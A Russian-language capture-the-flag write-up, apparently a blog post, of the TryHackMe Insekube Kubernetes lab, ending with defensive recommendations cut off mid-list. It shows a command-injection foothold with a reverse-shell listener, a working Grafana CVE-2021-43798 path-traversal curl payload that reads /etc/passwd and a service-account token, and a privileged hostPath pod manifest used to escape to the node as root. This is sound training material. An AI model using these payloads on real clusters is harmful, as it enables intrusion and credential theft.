{"id":334421,"date":"2022-06-13T21:01:40","date_gmt":"2022-06-13T21:01:40","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=334421"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=334421","title":{"rendered":"<span>\u0410\u0442\u0430\u043a\u0443\u0435\u043c \u043a\u043b\u0430\u0441\u0442\u0435\u0440 Kubernetes. \u0420\u0430\u0437\u0431\u043e\u0440 Insekube c TryHackme<\/span>"},"content":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442! \u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435, \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u043c\u0430\u0448\u0438\u043d\u044b Insekube \u0441 TryHackme, \u044f \u043f\u043e\u0441\u0442\u0430\u0440\u0430\u044e\u0441\u044c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u044b \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430 Kubernetes \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u044e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u044d\u0442\u043e\u0433\u043e. \u041f\u0440\u0438\u044f\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0447\u0442\u0435\u043d\u0438\u044f!<\/p>\n<h2>\u0418\u0449\u0435\u043c \u0442\u043e\u0447\u043a\u0443 \u0432\u0445\u043e\u0434\u0430<\/h2>\n<p>\u0420\u0430\u0441\u0447\u0435\u0445\u043b\u044f\u0435\u043c nmap:<\/p>\n<pre><code class=\"bash\">nmap 10.10.221.142  Starting Nmap 7.60 ( https:\/\/nmap.org ) at 2022-06-07 17:08 BST Nmap scan report for ip-10-10-221-142.eu-west-1.compute.internal (10.10.221.142) Host is up (0.0015s latency). Not shown: 998 closed ports PORT   STATE SERVICE 22\/tcp open  ssh 80\/tcp open  http MAC Address: 02:BF:D5:06:FF:D9 (Unknown)  Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds<\/code><\/pre>\n<p>\u041e\u043f\u0438\u0440\u0430\u044f\u0441\u044c \u043d\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0442\u0430\u0447\u043a\u0438 \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u0431\u044b \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043a\u0430\u043a\u0438\u0435-\u043d\u0438\u0431\u0443\u0434\u044c \u043f\u043e\u0440\u0442\u044b Kubernetes, \u043d\u043e \u0432\u0438\u0434\u0438\u043c \u0442\u043e\u0440\u0447\u0430\u0449\u0438\u0439 \u043d\u0430\u0440\u0443\u0436\u0443 80 \u043f\u043e\u0440\u0442. \u041e\u043a\u0435\u0439, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c \u0430\u0434\u0440\u0435\u0441 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f24\/ef5\/e7b\/f24ef5e7b7297d90ce35b5e87788fea4.png\" width=\"1184\" height=\"360\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/f24\/ef5\/e7b\/f24ef5e7b7297d90ce35b5e87788fea4.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0434\u0430\u0442\u044c \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u0438\u043d\u043f\u0443\u0442 \u0438 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u043c, \u0447\u0442\u043e \u044d\u0442\u043e \u043e\u0431\u044b\u0447\u043d\u044b\u0439 ping.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d3d\/029\/a10\/d3d029a103daba2c8462fe2fc7ec98d6.png\" width=\"1740\" height=\"628\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/d3d\/029\/a10\/d3d029a103daba2c8462fe2fc7ec98d6.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0421\u0443\u0434\u044f \u043f\u043e \u043e\u0442\u0432\u0435\u0442\u0443, \u0433\u0434\u0435-\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u043d\u0430\u044f \u0442\u0443\u043b\u0437\u0430 ping. \u0422\u0443\u0442 \u0436\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442 \u0438\u0434\u0435\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0432\u0432\u043e\u0434 \u043d\u0430 <code>command injection<\/code> \u2013 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442!<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/070\/6ab\/e00\/0706abe00b76a6c039c9b54e17f52076.png\" width=\"1596\" height=\"696\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/070\/6ab\/e00\/0706abe00b76a6c039c9b54e17f52076.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041d\u0435\u0434\u043e\u043b\u0433\u043e \u0434\u0443\u043c\u0430\u044f, \u043f\u0440\u043e\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u043c reverse shell \u0438 \u043b\u043e\u0432\u0438\u043c \u0431\u044d\u043a-\u043a\u043e\u043d\u043d\u0435\u043a\u0442:<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d11\/fc4\/afb\/d11fc4afb0f85c3751d4c0fa3957e362.png\" width=\"1262\" height=\"298\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/d11\/fc4\/afb\/d11fc4afb0f85c3751d4c0fa3957e362.png\"\/><figcaption><\/figcaption><\/figure>\n<pre><code class=\"bash\">nc -nlvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.10.221.142 57278 received! \/bin\/sh: 0: can't access tty; job control turned off $ id     uid=1000(challenge) gid=1000(challenge) groups=1000(challenge)<\/code><\/pre>\n<h2>\u0412\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430<\/h2>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u043c\u044b \u0432\u043d\u0443\u0442\u0440\u0438. \u0422\u043e\u043b\u044c\u043a\u043e \u0432\u043e\u0442 \u0432\u043d\u0443\u0442\u0440\u0438 \u0447\u0435\u0433\u043e? \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f. \u0412\u0438\u0434\u0438\u043c \u0445\u043e\u0440\u043e\u0448\u043e \u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0434\u043b\u044f Kubernetes \u2013 \u043e\u0442\u0441\u044e\u0434\u0430 \u0434\u0435\u043b\u0430\u0435\u043c \u0432\u044b\u0432\u043e\u0434: \u043c\u044b \u0432\u043d\u0443\u0442\u0440\u0438 Pod! \u0418\u0437 <strong>env<\/strong> \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433.<\/p>\n<pre><code class=\"bash\">$ env KUBERNETES_SERVICE_PORT=443 KUBERNETES_PORT=tcp:\/\/10.96.0.1:443 HOSTNAME=syringe-79b66d66d7-7mxhd ...<\/code><\/pre>\n<p>\u0412\u043d\u0443\u0442\u0440\u0438 \u0441\u0430\u043c\u043e\u0433\u043e Pod \u0434\u043b\u044f \u043d\u0430\u0441 \u043c\u0430\u043b\u043e \u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e, \u043d\u043e \u0443 \u043d\u0435\u0433\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 Service Account, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u0434\u0430\u0442\u044c \u043d\u0430\u043c \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u2013 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0442\u0430\u043a\u0438\u0435 Pod, \u0447\u0442\u043e\u0431\u044b \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u043e\u0431\u0435\u0433 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0438 \u0432\u044b\u0440\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0445\u043e\u0441\u0442.  \u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043d\u0430\u043c \u043d\u0443\u0436\u0435\u043d <code>kubectl<\/code>. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0435\u0441\u0442\u044c \u043b\u0438 \u043e\u043d \u0433\u0434\u0435 \u043d\u0438\u0431\u0443\u0434\u044c \u0432 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0435, \u0432\u0434\u0440\u0443\u0433 \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0435\u0433\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0438\u0437\u0432\u043d\u0435.<\/p>\n<pre><code class=\"bash\">find \/ -name \"kubectl\" find: '\/etc\/ssl\/private': Permission denied find: '\/var\/lib\/apt\/lists\/partial': Permission denied find: '\/var\/cache\/apt\/archives\/partial': Permission denied find: '\/var\/cache\/ldconfig': Permission denied find: '\/proc\/tty\/driver': Permission denied \/tmp\/kubectl<\/code><\/pre>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e! \u0422\u043e \u0447\u0442\u043e \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e. \u041a\u0442\u043e-\u0442\u043e \u0431\u0435\u0440\u0435\u0436\u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0438\u043b <strong>kubectl<\/strong> \u0434\u043b\u044f \u043d\u0430\u0441 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 <code>\/tmp <\/code>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043b\u0438 \u0443 \u043d\u0430\u0441 \u043f\u0440\u0430\u0432 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u043e\u0433\u043e Pod:<\/p>\n<pre><code class=\"bash\">$ cd \/tmp $ ls kubectl $ .\/kubectl auth can-i create pods no<\/code><\/pre>\n<p>\u0414\u0430 \u0443\u0436, \u043d\u0435 \u0433\u0443\u0441\u0442\u043e. \u041d\u043e \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c Secrets \u043c\u044b \u043c\u043e\u0436\u0435\u043c. \u0422\u0430\u043c \u0436\u0435 \u043b\u0435\u0436\u0438\u0442 \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433. \u0411\u0443\u0434\u0435\u043c \u0438\u0441\u043a\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0439 \u0432\u0435\u043a\u0442\u043e\u0440.<\/p>\n<pre><code class=\"bash\">$ .\/kubectl get secrets NAME                    TYPE                                  DATA default-token-8bksk     kubernetes.io\/service-account-token   3 developer-token-74lck   kubernetes.io\/service-account-token   3 secretflag              Opaque                                1 syringe-token-g85mg     kubernetes.io\/service-account-token   3<\/code><\/pre>\n<p>\u041e\u0441\u043e\u0431\u043e \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435, \u043f\u0440\u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435 <strong>env,<\/strong> \u0443\u0432\u0438\u0434\u0435\u043b\u0438, \u0447\u0442\u043e \u0442\u0430\u043c \u0442\u0430\u043a\u0436\u0435 \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043e\u0442 Grafana \u2013 \u0430\u0434\u0440\u0435\u0441 \u0438 \u043f\u043e\u0440\u0442. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043e\u043d\u0430 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u0430 \u0432 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0435 \u0438 \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u0447\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u043d\u0435\u0451 \u0438\u0437 Pod! \u0412 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0435 \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u0442\u044c curl, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0431\u043b\u0435\u0433\u0447\u0438\u0442 \u043d\u0430\u043c \u044d\u0442\u0443 \u0437\u0430\u0434\u0430\u0447\u0443. \u041f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0441\u0442\u0443\u0447\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u044d\u043d\u0434\u043f\u043e\u0438\u043d\u0442 Grafana:<\/p>\n<pre><code class=\"bash\">curl 10.108.133.228:3000\/login<\/code><\/pre>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043e\u0442\u0432\u0435\u0442&#8230; \u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043f\u043b\u043e\u0445\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e Grafana, \u043c\u043e\u0436\u0435\u0442 \u043e\u043d\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0430\u044f \u0438 \u0434\u043b\u044f \u043d\u0435\u0451 \u0435\u0441\u0442\u044c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u043e\u0442\u0432\u0435\u0442\u0430 \u0432\u0438\u0434\u0438\u043c \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:<\/p>\n<pre><code class=\"bash\">...\"version\":\"8.3.0-beta2\"...<\/code><\/pre>\n<p>\u041f\u043e \u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0435 \u0432 \u0433\u0443\u0433\u043b\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c, \u0447\u0442\u043e \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u0430 CVE-2021-43798 \u2013 <em>Grafana 8.x Path Traversal (Pre-Auth)<\/em>. \u0421\u0443\u043f\u0435\u0440! \u041a\u0430\u043a \u043d\u0430\u043c \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u043e? \u041c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c Token, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a Service Account \u0443 Grafana Pod \u2013 \u043e\u043d \u043c\u0430\u0443\u043d\u0442\u0438\u0442\u0441\u044f \u043f\u0440\u044f\u043c\u043e \u0432\u043d\u0443\u0442\u0440\u044c \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430. \u0415\u0441\u043b\u0438 \u0443 \u044d\u0442\u043e\u0433\u043e Pod \u0435\u0441\u0442\u044c \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 Service Account, \u0442\u043e \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u0442\u044c &#171;Bad Pod&#187; \u0434\u043b\u044f \u043f\u043e\u0431\u0435\u0433\u0430 \u043d\u0430 \u0445\u043e\u0441\u0442!<\/p>\n<p>\u0424\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441 \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439, \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u043b path traversal. \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0430\u0433 <code>--path-as-is<\/code>, \u0447\u0442\u043e\u0431\u044b curl \u043d\u0435 \u0441\u0445\u043b\u043e\u043f\u044b\u0432\u0430\u043b \u043d\u0430\u0448 \u043f\u044d\u0439\u043b\u043e\u0430\u0434:<\/p>\n<pre><code class=\"bash\">curl --path-as-is 10.108.133.228:3000\/public\/plugins\/alertGroups\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed 100  1230  100  1230    0     0   600k      0 --:--:-- --:--:-- --:--:--  600k root:x:0:0:root:\/root:\/bin\/ash bin:x:1:1:bin:\/bin:\/sbin\/nologin ...<\/code><\/pre>\n<p>\u0420\u0430\u0431\u043e\u0442\u0430\u0435\u0442! \u0422\u0435\u043f\u0435\u0440\u044c \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043f\u0443\u0442\u044c \u0434\u043e Token (\u043e\u043d \u043b\u0435\u0436\u0438\u0442 \u0432 <code>\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token<\/code>) \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u043e\u0442\u0432\u0435\u0442:<\/p>\n<pre><code class=\"bash\">curl --path-as-is 10.108.133.228:3000\/public\/plugins\/alertGroups\/..\/..\/..\/..\/..\/..\/..\/..\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed 100  1022  100  1022    0     0   499k      0 --:--:-- --:--:-- --:--:--  499k eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUtUb21jcjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjg2MTU5NjAzLCJpYXQiOjE2NTQ2MjM2MDMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZX<\/code><\/pre>\n<pre><code class=\"bash\">export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUt...<\/code><\/pre>\n<p>\u0415\u0449\u0451 \u0440\u0430\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c Pod, \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0447\u0435\u0440\u0435\u0437 \u043d\u043e\u0432\u044b\u0439 Service Account:<\/p>\n<pre><code class=\"bash\">$ .\/kubectl auth can-i create pods --token=$TOKEN yes<\/code><\/pre>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e. \u0421\u043e\u0437\u0434\u0430\u0435\u043c &#171;Bad Pod&#187; \u0434\u043b\u044f \u043f\u043e\u0431\u0435\u0433\u0430 \u043d\u0430 \u0445\u043e\u0441\u0442:<\/p>\n<pre><code class=\"bash\">cat &lt;&lt;EOF | .\/kubectl create --token=$TOKEN -f - apiVersion: v1 kind: Pod metadata:   name: everything-allowed-exec-pod   labels:     app: pentest spec:   hostNetwork: true   hostPID: true   hostIPC: true   containers:   - name: everything-allowed-pod     image: ubuntu     securityContext:       privileged: true     volumeMounts:     - mountPath: \/host       name: noderoot     command: [ \"\/bin\/sh\", \"-c\", \"--\" ]     args: [ \"while true; do sleep 30; done;\" ]   volumes:   - name: noderoot     hostPath:       path: \/ EOF<\/code><\/pre>\n<p>\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0441\u043e\u0437\u0434\u0430\u043b\u0441\u044f \u043b\u0438 Pod:<\/p>\n<pre><code class=\"bash\">$ .\/kubectl get po --token=$TOKEN NAME                          READY   STATUS         RESTARTS        AGE everything-allowed-exec-pod   0\/1     ErrImagePull   0               29s grafana-57454c95cb-v4nrk      1\/1     Running        10 (127d ago)   151d syringe-79b66d66d7-7mxhd      1\/1     Running        1 (127d ago)    127d<\/code><\/pre>\n<p>\u041d\u043e \u043d\u0435 \u0432\u0441\u0451 \u0442\u0430\u043a \u043f\u0440\u043e\u0441\u0442\u043e! Pod \u043d\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0441\u044f \u2013 \u043d\u0435 \u0441\u043f\u0443\u043b\u043b\u0438\u043b\u0441\u044f \u043e\u0431\u0440\u0430\u0437. \u0412\u0438\u0434\u0438\u043c\u043e \u043a\u043b\u0430\u0441\u0442\u0435\u0440 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u043f\u043e \u0441\u0435\u0442\u0438. \u041d\u043e \u0435\u0441\u043b\u0438 \u043e\u0431\u0440\u0430\u0437 \u0443\u0436\u0435 \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0441\u044f, \u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c \u0443\u0434\u0430\u0447\u0443 \u0438 \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c <code>imagePullPolicy: IfNotPresent<\/code><\/p>\n<pre><code>... containers:   - name: everything-allowed-pod     image: ubuntu     imagePullPolicy: IfNotPresent ...<\/code><\/pre>\n<p>\u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e. \u0417\u0430\u0445\u043e\u0434\u0438\u043c \u0432 Pod \u2013> \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 \u2013> \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0444\u043b\u0430\u0433:<\/p>\n<pre><code class=\"bash\">$ .\/kubectl get po --token=$TOKEN NAME                          READY   STATUS    RESTARTS        AGE everything-allowed-exec-pod   1\/1     Running   0               12s grafana-57454c95cb-v4nrk      1\/1     Running   10 (127d ago)   151d syringe-79b66d66d7-7mxhd      1\/1     Running   1 (127d ago)    127d $ .\/kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- bash Unable to use a TTY - input is not a terminal or the right kind of file id uid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n<h2>\u041a\u0430\u043a \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c?<\/h2>\n<ul>\n<li>\n<p>Network Policy \u2013  \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0431\u044b \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u043f\u043e \u0441\u0435\u0442\u0438. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043a\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u043f\u0440\u0435\u0442\u0438\u0442 \u0441\u0442\u0443\u0447\u0430\u0442\u044c\u0441\u044f \u0438\u0437 Pod \u0441 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0432 Pod \u0441 Grafana<\/p>\n<\/li>\n<li>\n<p>Policy engine \u2013  \u0438\u043c\u0435\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043d\u0430 \u0437\u0430\u043f\u0440\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 Pod, \u043e\u0442 Kyverno \u0438\u043b\u0438 Gatekeeper, \u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0431\u044b \u0441\u0431\u0435\u0436\u0430\u0442\u044c \u043d\u0430 \u0445\u043e\u0441\u0442. \u0417\u0430\u043f\u0440\u043e\u0441 \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u043b \u0431\u044b \u0447\u0435\u0440\u0435\u0437 webhook<\/p>\n<\/li>\n<li>\n<p>Runtime observability &amp; security \u2013 \u0437\u043d\u0430\u043d\u0438\u0435 \u0438 \u043f\u043e\u043b\u043d\u0430\u044f \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0435\u0433\u043e \u0432 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0435 